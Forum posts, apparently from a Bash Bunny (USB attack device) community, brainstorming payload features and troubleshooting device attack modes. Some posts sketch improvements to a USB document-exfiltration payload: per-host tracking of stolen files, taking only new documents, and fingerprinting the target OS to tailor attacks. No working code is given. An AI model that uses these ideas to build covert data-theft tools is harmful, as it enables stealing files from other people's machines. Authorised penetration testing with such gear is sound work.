[Run on Battery for instant attacks?]

As a side-note, the battery should be able to charged from the target's machine. :) Then some sort of external switch to turn the BB "on" when needed so as to preserve that oh-so-precious charge. 

[Quickest Way to Fingerprint/Identify Target Host]

I hadn't really heard of p0f before, and am excited to try that out! :D

 

In regards to the exfil, since the BB is quite the little gadget ( thank you so much for this, Darren :] ) there's possibility to add some smarts. Keep a directory listing/db for each box the BB has hit, as well as a lookup of each file that was successfully exfilled, along with some metadata about that file. (Either a hash, or TimeStamp) If it sees it's the same box, only exfil new documents, or ones that have been modified? 

 

This also may be the wrong thread and I'll move it if I need to, but the RNDIS/ECM switching occurred to me yesterday and I got so amped about it I had to give it a shot. On my OSX the RNDIS failed (should'a guessed that one) and the payload switched to ECM. The issue is that after sourcing bunny_helpers and attempting the nmap payload, the hostname was "nobody", and the nmap showed 0 open ports (after scanning for 3 seconds vs ~200 I would expect). Running the same payload but reversing the order of Ethernet adapters to ECM first conducted a successful sweep. 

 

Tha

[Quickest Way to Fingerprint/Identify Target Host]

As a brainstorming exercise, I was wondering if anyone had ideas on the quickest way to identify/fingerprint the target computer? Hypothetically, I'd be able to run the same payload against various targets, and customize the attack based on what type of computer I'm plugged in to (Windows/OSX/Win7/Win10/ElCap/Mint) and react accordingly.

Would it then also be possible to identify a known computer I was talking to? My own station, for example. Possibly using a V2 of the UsbExfiltration payload which could be used repeatedly on a range of computers. Then as soon as the BB is filled, alert the attacker and let them know it's time to offload. The attacker would then plug it into their station and either the BB gets internet to upload the docs, or just offloads them to the local system and prepares itself for more extraction. 

Having typed all that out, I suppose having an "Exfil" mode on Switch1 and an "Offload" mode on Switch2 would simplify things considerably, but the general question stands: What is the best way to quickly identify the type of Target Host to then react accordingly?

[Read only file system]

I also ran into this, likely while doing the "install_tools" as well. 

This StackOverflow helped me a lot: http://askubuntu.com/questions/563764/usb-devices-showing-a-read-only 

 

TL;DR: 

• Unmount the BashBunny drive (/dev/sdb or /dev/sdc or /dev/sdd or etc...): sudo umount -f /dev/sdb
• Fix the drive: sudo dosfsck /dev/sdb

[Run on Battery for instant attacks?]

Having played with the Bash Bunny, I can say that the boot-up time is SERIOUSLY impressive. 

 

It's also worth considering that when you specify "ATTACKMODE RNDIS_ETHERNET", and the like, "ATTACKMODE" is kept as an executable on the BB itself, and IIRC is just a bash script itself. Part of what it does when you select one of the ETHERNET modes is create an authoritative DHCP server, register as the specified device, and wait to ensure the target successfully takes out a lease. I'll attempt to verify what happens if the statement times out (Can't remember if the payload errors, or if it just times out no-worries-mate-I-got-ya-style and keeps going). In situations like this, there may be some additional care to be taken. 

 

However, if you could start a payload on the BB using a battery, and if there were some directive like "WAIT_FOR_INSERT"... You might be able to offload the startup of a larger attack/server/payload/db/whathaveyou. Definitely interested to see what you come up with. Who knows, might be a selling feature in BB2.0 :)